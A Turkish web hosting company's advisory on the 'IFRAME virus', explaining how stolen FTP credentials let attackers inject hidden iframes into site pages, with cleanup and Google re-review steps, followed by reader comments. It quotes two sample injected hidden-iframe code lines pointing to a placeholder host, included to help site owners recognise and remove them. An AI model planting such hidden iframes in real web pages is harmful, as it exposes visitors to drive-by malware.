Iframe virüsü hakkında bilgilendirme

iframe-virusuWeb sitelerini tehdit eden IFRAME Virüsü hakkında önemli duyuru!
Bir süredir yaygınlaşmaya başlayan ve pek çok web sitesinin olumsuz etkilendiği IFRAME Virüsü hakkında sizi bilgilendirmek istiyoruz.

IFRAME Virüsü nedir?

Virüslü bilgisayarlardan FTP girişi yapılan sitelerin index, default ve/veya tüm dosyalara zararlı bir IFRAME kodu yerleştirir. Virüs, sitenize giren kullanıcıların bilgisayarlarına virüs bulaştırmayı amaçlamaktadır.
Zararlı IFRAME Virüsü sitelere genellikle FTP üzerinden bulaşmaktadır.

Nasıl bulaşır :
1. Saldırgan öncelikle güncel antivirus yazılımları ile korunmayan bilgisayarınıza bir virus bulaştırır.
2. Bilgisayarınıza Bulaştırılan virüsun amacı bilgisayarınızdaki FTP Programında şifrenin saklandığı dosyayı ve/veya ftp şifrenizi çalmaktır . FTP bilgileri çalındıktan sonra, saldırgan dilediği zaman ftp girişi yapıp, sitenizin index.*, default.* veya tüm dosyalarınızın html taglarının arasına (genellikle sayfanın sonuna) iftame veya script tagı yerleştirir.
IFRAME tagı sayfanızın html tagları arasında gizlenir. Sayfanızı ziyaret eden kullanıcılara virus bulaştırmayı amaçlamaktadır.
IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından da bulaşabilir. Sitenizdeki dosya ve klasörlerin yazma izinlerinin açık olmasını kullanarak dosyalarınıza bulaşabilir.

IFRAME kod örnekleri:
<IFRAME src=’http://siteadresi/index.php’ style=’border:0px solid gray;’ WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></IFRAME>

echo “<IFRAME src=\”http://siteadresi\123″ width=1 height=1 style=\”visibility:hidden;position:absolute\”></IFRAME>”;

Korunmak için yapmanız gerekenler:
1. FTP şifrenizi değiştiriniz.
2. Bilgisayarınızda güncel bir antivirüs yazılımı kullanınız.
3. FTP şifrenizi otomatik girişe ayarlamayın veya FTP girişlerinden sonra şifrenizi değiştiriniz.
4. IFRAME Virüsü sitenizdeki php, asp veya asp.net kod açıklarından bulaşmış olabilir. Bundan korunmak için kontrol panelinizden dosyalarınızın yazma izinlerini kaldırınız, sadece gerekli dosya veya klasörlerinize yazma izni veriniz. Linux sunucularımızdan hizmet alıyorsanız FTP programınızdan özellikle index.* ve default.* dosya izinlerini 444 (read/okuma) olarak ayarlayınız.

Sitelerinizi kontrol ediniz:
Sitenizdeki index.*, default.* dosyalarını bilgisayarınıza indirip html kodlarını gözden geçiriniz. Index.* ve/veya default.* dosyalarınız temiz ise virüs bulaşmamış demektir. Virüs öncelikle bu dosyalara bulaşır. Ancak yine de diğer doslarınızın güncellenme tarihlerini gözden geçiriniz.
Zararlı kod bulaşmış dosyalarınızı temizleyiniz.
IFRAME Virüsü bulaşan siteler Google arama motoru ve Firefox tarayıcısı tarafından saldırgan site olarak sınıflandırılır. Bu sitelere giriş izni verilmez.
Siteniz Google’da saldırgan site olarak listeleniyorsa:

IFRAME Virüsü bulunan site google arama sonuçlarında saldırgan site olarak gösterilir. Bunu düzeltmek için şunları yapabilirsiniz:

1. http://www.google.com/webmasters/tools/ adresine giriş yapınız.
2. Gmail hesabınız veya yeni bir hesap ile giriş yapınız.
3. Sitenizi ekleyerek doğrulayınız.
4. Sitenizi doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı kodların bulaştığı sayfaları görün ve sayfalarınızdan zararlı kodları temizleyin.
5. Sol menüden ?Siteyi tekrar değerlendirme? seçeneğine tıklayın ?
6. Sitenizde bulunan zararlı kodları kaldırdığınızı ve tekrar değerlendirmelerini rica ediniz.
7. Siteniz birkaç gün içinde saldırgan site olmaktan çıkarılacaktır !

IFRAME Virüsü hakkında detaylı bilgi için:
http://www.google.com.tr/search?hl=tr&q=iframe+vir%C3%BCs%C3%BC&meta=&aq=f&oq=

Bu makale Markum.net tarafından hazırlanıp müşterilerine bilgilendirme amacıyla gönderilmiştir.

İlginizi Çekebilecek Diğer İçerikler

4 Yorum

 1. Birkan dedi ki:

  Hocam  geçenlerde google analytics bakarken kimse yok sitede  hayırdır inşallah diyip siteye baktım zararlı içerik uyarısı aldığımı gördüm,1saat içinde eski yedekler sayesinde (1haftalık yedek)siteyi fişlenmekten kurtardım baktım hit almaya başladım yükselişte eyvallah,fakat gel gelelim o günden beri site fena kan kaybediyor,bu da benim canımı fena sıkıyor,bu süreçte benim için normal google için anormal durum nedir,yani daha ne yapayım google mı diyeyim  kafamı taşlara mı vurim  yemin ederim gerizekalı bu çocuk mu diyeyim kendime:/
  bafrafm.com

  • Caner Öncel dedi ki:

   Valla Birkan Google amcayla ilişkimiz pek öyle parmakla gösterilir türden değil. Şahsen ben de gizli çalışma yöntemlerini çözebilmiş değilim.

 2. Birkan dedi ki:

   bakalım hacım  belli bir süre beklicem sanırım radyo açılaydı ben hepsine sorucam :D

Uyarı: Yorumlarda link kullanmayınız. Link içeren yorumlar otomatik olarak spam kabul edilmektedir.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.